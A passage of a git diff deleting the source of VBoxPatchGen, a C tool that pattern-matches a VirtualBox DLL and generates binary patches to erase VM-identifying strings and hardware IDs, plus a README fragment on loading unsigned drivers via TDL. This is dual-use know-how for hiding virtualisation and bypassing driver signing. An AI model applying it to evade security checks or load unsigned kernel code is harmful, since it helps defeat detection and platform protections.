-where %1 file to be signed
-
-
-Warning
-
-Use signed driver with signed loader and vise versa.
-Signed version of Tsugumi is incompatible with unsigned loader and TDL.
-Unsigned version of Tsugumi is incompatible with signed loader.
-
-Using unsigned driver (loaded by TDL) in Windows 10 is unsafe because of Windows 10 TH2 Kernel Patch Protection (PatchGuard) improvements.
-
-Last update
-01/Feb/17
diff --git a/Source/Kasumi/VBoxPatchGen.sln b/Source/Kasumi/VBoxPatchGen.sln
deleted file mode 100644
index e587ffe..0000000
--- a/Source/Kasumi/VBoxPatchGen.sln
+++ /dev/null
@@ -1,22 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 14
-VisualStudioVersion = 14.0.25420.1
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Kasumi", "VBoxPatchGen\VBoxPatchGen.vcxproj", "{F706DA8E-B4E2-4E2B-A47E-317C7408303D}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|x64 = Debug|x64
- Release|x64 = Release|x64
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Debug|x64.ActiveCfg = Debug|x64
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Debug|x64.Build.0 = Debug|x64
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Release|x64.ActiveCfg = Release|x64
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Release|x64.Build.0 = Release|x64
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/Source/Kasumi/VBoxPatchGen/Resource.rc b/Source/Kasumi/VBoxPatchGen/Resource.rc
deleted file mode 100644
index 2db7819..0000000
Binary files a/Source/Kasumi/VBoxPatchGen/Resource.rc and /dev/null differ
diff --git a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.filters b/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.filters
deleted file mode 100644
index 06a35cf..0000000
--- a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.filters
+++ /dev/null
@@ -1,77 +0,0 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hh;hpp;hxx;hm;inl;inc;xsd - - - {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} - rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms - - - {ef6cbfd0-0ca3-4afc-869c-678c8446d78d} - - - - - Source Files - - - Source Files - - - minirtl - - - minirtl - - - minirtl - - - minirtl - - - minirtl - - - minirtl - - - - - Header Files - - - Header Files - - - minirtl - - - minirtl - - - Header Files - - - minirtl - - - Header Files - - - Header Files - - - - - Resource Files - - - \ No newline at end of file diff --git a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.user b/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.user deleted file mode 100644 index ebdf692..0000000 --- a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.user +++ /dev/null @@ -1,11 +0,0 @@ - - - - c:\vbox\vboxdd_5.1.12.dll - WindowsLocalDebugger - - - c:\vbox\vboxdd_5.1.12.dll - WindowsLocalDebugger - - \ No newline at end of file diff --git a/Source/Kasumi/VBoxPatchGen/cui.c b/Source/Kasumi/VBoxPatchGen/cui.c deleted file mode 100644 index 9ce5dcd..0000000 --- a/Source/Kasumi/VBoxPatchGen/cui.c +++ /dev/null 
@@ -1,223 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2016 - 2018 -* -* TITLE: CUI.C -* -* VERSION: 1.30 -* -* DATE: 01 Aug 2018 -* -* Console output. -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#include "global.h" - -HANDLE g_ConOut = NULL, g_ConIn = NULL; -BOOL g_ConsoleOutput = FALSE; -WCHAR g_BE = 0xFEFF; - -/* -* cuiInitialize -* -* Purpose: -* -* Initialize console input/output. -* -*/ -VOID cuiInitialize( - _In_ BOOL InitInput, - _Out_opt_ PBOOL IsConsoleOutput -) -{ - ULONG dummy; - - g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); - - if (InitInput) g_ConIn = GetStdHandle(STD_INPUT_HANDLE); - - SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); - - g_ConsoleOutput = TRUE; - if (!GetConsoleMode(g_ConOut, &dummy)) { - g_ConsoleOutput = FALSE; - WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL); - } - - if (IsConsoleOutput) - *IsConsoleOutput = g_ConsoleOutput; - - return; -} - -/* -* cuiClrScr -* -* Purpose: -* -* Clear screen. 
-* -*/ -VOID cuiClrScr( - VOID -) -{ - COORD coordScreen; - DWORD cCharsWritten; - DWORD dwConSize; - CONSOLE_SCREEN_BUFFER_INFO csbi; - - coordScreen.X = 0; - coordScreen.Y = 0; - - if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi)) - return; - - dwConSize = csbi.dwSize.X * csbi.dwSize.Y; - - if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '), - dwConSize, coordScreen, &cCharsWritten)) - return; - - if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi)) - return; - - if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes, - dwConSize, coordScreen, &cCharsWritten)) - return; - - SetConsoleCursorPosition(g_ConOut, coordScreen); -} - -/* -* cuiPrintTextA -* -* Purpose: -* -* Output text to the console or file. -* ANSI version. -* -*/ -VOID cuiPrintTextA( - _In_ LPSTR lpText, - _In_ BOOL UseReturn -) -{ - SIZE_T consoleIO; - DWORD bytesIO; - LPSTR Buffer; - - if (lpText == NULL) - return; - - consoleIO = _strlen_a(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; - - consoleIO = 5 + consoleIO; - Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { - - _strcpy_a(Buffer, lpText); - if (UseReturn) _strcat_a(Buffer, "\r\n"); - - consoleIO = _strlen_a(Buffer); - - if (g_ConsoleOutput != FALSE) { - WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - HeapFree(GetProcessHeap(), 0, Buffer); - } -} - -/* -* cuiPrintTextW -* -* Purpose: -* -* Output text to the console or file. -* UNICODE version. 
-* -*/ -VOID cuiPrintTextW( - _In_ LPWSTR lpText, - _In_ BOOL UseReturn - ) -{ - SIZE_T consoleIO; - DWORD bytesIO; - LPWSTR Buffer; - - if (lpText == NULL) - return; - - consoleIO = _strlen_w(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; - - consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL); - Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { - - _strcpy(Buffer, lpText); - if (UseReturn) _strcat_w(Buffer, TEXT("\r\n")); - - consoleIO = _strlen_w(Buffer); - - if (g_ConsoleOutput != FALSE) { - WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); - } - HeapFree(GetProcessHeap(), 0, Buffer); - } -} - -/* -* cuiPrintTextLastErrorA -* -* Purpose: -* -* Output LastError translated code to the console or file. -* ANSI version. -* -*/ -VOID cuiPrintTextLastErrorA( - _In_ BOOL UseReturn - ) -{ - CHAR szTextBuffer[512]; - DWORD dwLastError = GetLastError(); - - FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, 512, NULL); - cuiPrintTextA(szTextBuffer, UseReturn); -} - -/* -* cuiPrintTextLastErrorW -* -* Purpose: -* -* Output LastError translated code to the console or file. -* UNICODE version. -* -*/ -VOID cuiPrintTextLastErrorW( - _In_ BOOL UseReturn -) -{ - WCHAR szTextBuffer[512]; - DWORD dwLastError = GetLastError(); - - FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, 512, NULL); - cuiPrintTextW(szTextBuffer, UseReturn); -} diff --git a/Source/Kasumi/VBoxPatchGen/cui.h b/Source/Kasumi/VBoxPatchGen/cui.h deleted file mode 100644 index 229124f..0000000 --- a/Source/Kasumi/VBoxPatchGen/cui.h +++ /dev/null 
@@ -1,55 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2016 - 2018 -* -* TITLE: CUI.H -* -* VERSION: 1.30 -* -* DATE: 01 Aug 2018 -* -* Common header file for console ui. -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#pragma once - -VOID cuiInitialize( - _In_ BOOL InitInput, - _Out_opt_ PBOOL IsConsoleOutput - ); - -#ifdef _UNICODE -#define cuiPrintText cuiPrintTextW -#define cuiPrintTextLastError cuiPrintTextLastErrorW -#else -#define cuiPrintText cuiPrintTextA -#define cuiPrintTextLastError cuiPrintTextLastErrorA -#endif - - -VOID cuiPrintTextA( - _In_ LPSTR lpText, - _In_ BOOL UseReturn - ); - -VOID cuiPrintTextW( - _In_ LPWSTR lpText, - _In_ BOOL UseReturn - ); - -VOID cuiPrintTextLastErrorA( - _In_ BOOL UseReturn - ); - -VOID cuiPrintTextLastErrorW( - _In_ BOOL UseReturn - ); - -VOID cuiClrScr( - VOID - ); diff --git a/Source/Kasumi/VBoxPatchGen/main.c b/Source/Kasumi/VBoxPatchGen/main.c deleted file mode 100644 index b72a3f1..0000000 --- a/Source/Kasumi/VBoxPatchGen/main.c +++ /dev/null 
@@ -1,639 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2017 - 2019
-*
-* TITLE: MAIN.C
-*
-* VERSION: 1.20
-*
-* DATE: 04 Jan 2019
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-#include "global.h"
-
-#define T_PROGRAMTITLE L"VirtualBox Patch Generator v1.2.0.1901"
-#define T_FILEINFAIL L"\r\nVPG: Error while processing input file"
-#define T_FILEOUTFAIL L"\r\nVPG: Error while processing output file"
-
-#define MAX_HWID_BLOCKS_DEEP 32
-#define MAX_PATCH_BLOCKS 256
-
-BINARY_PATCH_BLOCK_INTERNAL *DataBlocks;
-
-/*
-* FindPattern
-*
-* Purpose:
-*
-* Lookup pattern in buffer.
-*
-*/
-PVOID FindPattern(
- CONST PBYTE Buffer,
- SIZE_T BufferSize,
- CONST PBYTE Pattern,
- SIZE_T PatternSize
-)
-{
- PBYTE p = Buffer;
-
- if (PatternSize == 0)
- return NULL;
- if (BufferSize < PatternSize)
- return NULL;
- BufferSize -= PatternSize;
-
- do {
- p = memchr(p, Pattern[0], BufferSize - (p - Buffer));
- if (p == NULL)
- break;
-
- if (memcmp(p, Pattern, PatternSize) == 0)
- return p;
-
- p++;
- } while (BufferSize - (p - Buffer) > 0);
-
- return NULL;
-}
-
-/*
-* SaveTable
-*
-* Purpose:
-*
-* Build and save table to output file.
-*
-*/
-BOOL SaveTable(
- _In_ BINARY_PATCH_BLOCK_INTERNAL *PatchBlock,
- _In_ LPWSTR OutputFileName,
- _In_ UINT BlockCount
-)
-{
- UINT i;
- BOOL bResult = FALSE;
- PUCHAR Table = NULL;
- SIZE_T TableSize = 0;
- HANDLE hFile = INVALID_HANDLE_VALUE;
- DWORD dwEntrySize, ProcessedSize;
- TCHAR szOutputFileName[MAX_PATH * 2];
-
- TableSize = BlockCount * sizeof(BINARY_PATCH_BLOCK_INTERNAL);
- Table = (PUCHAR)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, TableSize);
- if (Table) {
- ProcessedSize = 0;
- for (i = 0; i < BlockCount; i++) {
- dwEntrySize = sizeof(ULONG) + sizeof(UCHAR) + (sizeof(UCHAR) * PatchBlock[i].DataLength);
- if (ProcessedSize + dwEntrySize > (DWORD)TableSize)
- break;
- RtlCopyMemory(&Table[ProcessedSize], &PatchBlock[i], dwEntrySize);
- ProcessedSize += dwEntrySize;
- }
- //error converting table, entries are missing
- if (i != BlockCount) {
- RtlFreeHeap(GetProcessHeap(), 0, Table);
- return FALSE;
- }
- RtlSecureZeroMemory(szOutputFileName, sizeof(szOutputFileName));
- GetCurrentDirectory(MAX_PATH, szOutputFileName);
- _strcat(szOutputFileName, OutputFileName);
-
- hFile = CreateFile(szOutputFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hFile != INVALID_HANDLE_VALUE) {
- WriteFile(hFile, Table, ProcessedSize, &dwEntrySize, NULL);
- CloseHandle(hFile);
- bResult = (dwEntrySize == ProcessedSize);
- }
- RtlFreeHeap(GetProcessHeap(), 0, Table);
- }
- return bResult;
-}
-
-/*
-* ProcessInputFile
-*
-* Purpose:
-*
-* Program entry point.
-*
-*/
-UINT ProcessInputFile(
- _In_ LPWSTR lpszPath
-)
-{
- UINT uResult = (UINT)-1;
- BOOL cond = FALSE;
- ULONG rlen, c = 0, d = 0;
-
- HANDLE fh = NULL, sec = NULL;
- OBJECT_ATTRIBUTES attr;
- UNICODE_STRING usFileName;
- IO_STATUS_BLOCK iosb;
- NTSTATUS status;
- PBYTE DllBase = NULL, Pattern;
- SIZE_T DllVirtualSize;
-
- TCHAR InputFile[MAX_PATH + 1], LogBuffer[MAX_PATH];
-
- RtlSecureZeroMemory(&usFileName, sizeof(usFileName));
-
- do {
-
- rlen = 0;
- RtlSecureZeroMemory(InputFile, sizeof(InputFile));
- GetCommandLineParam(lpszPath, 1, InputFile, MAX_PATH, &rlen);
- if (rlen == 0)
- break;
-
- if (GetFileAttributes(InputFile) == (DWORD)-1)
- break;
-
- if (RtlDosPathNameToNtPathName_U(InputFile, &usFileName, NULL, NULL) == FALSE)
- break;
-
- InitializeObjectAttributes(&attr, &usFileName,
- OBJ_CASE_INSENSITIVE, NULL, NULL);
- RtlSecureZeroMemory(&iosb, sizeof(iosb));
-
- status = NtCreateFile(&fh, SYNCHRONIZE | FILE_READ_DATA,
- &attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN,
- FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
-
- if (!NT_SUCCESS(status))
- break;
-
- status = NtCreateSection(&sec, SECTION_ALL_ACCESS, NULL,
- NULL, PAGE_READONLY, SEC_IMAGE, fh);
- if (!NT_SUCCESS(status))
- break;
-
- DllBase = NULL;
- DllVirtualSize = 0;
- status = NtMapViewOfSection(sec, NtCurrentProcess(), &DllBase,
- 0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY);
- if (!NT_SUCCESS(status))
- break;
-
- DataBlocks = (BINARY_PATCH_BLOCK_INTERNAL*)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY,
- sizeof(BINARY_PATCH_BLOCK_INTERNAL) * MAX_PATCH_BLOCKS);
- if (DataBlocks == NULL)
- break;
-
- c = 0;
-
- //locate VBOX patterns
- cuiPrintText(TEXT("\r\nPattern matching: 'VBOX'\r\n"), TRUE);
-
- //
- // FACP
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)FACP_PATTERN, sizeof(FACP_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(4 + Pattern - DllBase);
-
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("FACP\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern FACP not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // RSDT
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)RSDT_PATTERN, sizeof(RSDT_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("RSDT\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern RSDT not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // XSDT
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)XSDT_PATTERN, sizeof(XSDT_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("XSDT\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern XSDT not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // APIC
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)APIC_PATTERN, sizeof(APIC_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
-
_strcpy(LogBuffer, TEXT("APIC\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern APIC not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // HPET
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)HPET_PATTERN, sizeof(HPET_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("HPET\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern HPET not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // MCFG
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)MCFG_PATTERN, sizeof(MCFG_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("MCFG\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern MCFG not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // VBOXCPU
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VBOXCPU_PATTERN, sizeof(VBOXCPU_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(2 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOXCPU\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOXCPU not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // VBOX 1.0 CDROM
- //
- /*RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)CDROMVBOX_PATTERN, sizeof(CDROMVBOX_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(12 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOXCDROM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOXCDROM not found"));
- }
- cuiPrintText(LogBuffer, TRUE); */
-
- //
- // VBOX generic
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)JUSTVBOX_PATTERN, sizeof(JUSTVBOX_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOX\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOX generic not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //locate VirtualBox pattern
- cuiPrintText(TEXT("\r\nPattern matching: 'VirtualBox'\r\n"), TRUE);
-
- //
- // 'VirtualBox'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)JUSTVIRTUALBOX_PATTERN, sizeof(JUSTVIRTUALBOX_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox\t0x"));
-
ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // 'VirtualBox__'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VIRTUALBOX2020_PATTERN, sizeof(VIRTUALBOX2020_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox__\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox__ not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // 'VirtualBox GIM'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VIRTUALBOXGIM_PATTERN, sizeof(VIRTUALBOXGIM_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox GIM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tVirtualBox GIM pattern not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // 'VirtualBox VMM'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VIRTUALBOXVMM_PATTERN, sizeof(VIRTUALBOXVMM_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
-
_strcpy(LogBuffer, TEXT("VirtualBox VMM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox VMM not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //locate Configuration pattern
- cuiPrintText(TEXT("\r\nPattern matching: Configuration\r\n"), TRUE);
-
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)CFGSTRINGS_PATTERN, sizeof(CFGSTRINGS_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(26 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(CONFIGURATION_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, CONFIGURATION_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("Cfg\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern Configuration not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // HWID
- //
- cuiPrintText(TEXT("\r\nPattern matching: Hardware ID\r\n"), TRUE);
-
- //
- // 80EE
- //
-
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- d = 0;
- Pattern = DllBase;
- do {
- Pattern = FindPattern(
- (CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase),
- (CONST PBYTE)PCI80EE_PATTERN, sizeof(PCI80EE_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_1);
- RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_1, DataBlocks[c].DataLength);
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- _strcpy(LogBuffer, TEXT("80EE\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- cuiPrintText(LogBuffer, TRUE);
- c += 1;
- d += 1;
- if (d > MAX_HWID_BLOCKS_DEEP) {
- cuiPrintText(TEXT("\r\nVPG: Maximum hwid blocks deep, abort scan.\r\n"), TRUE);
- break;
- }
- }
- else {
- break;
- }
- Pattern++;
- } while (DllVirtualSize - (Pattern - DllBase) > 0);
-
-
//
- // BEEF
- //
-
- d = 0;
- Pattern = DllBase;
- do {
- Pattern = FindPattern(
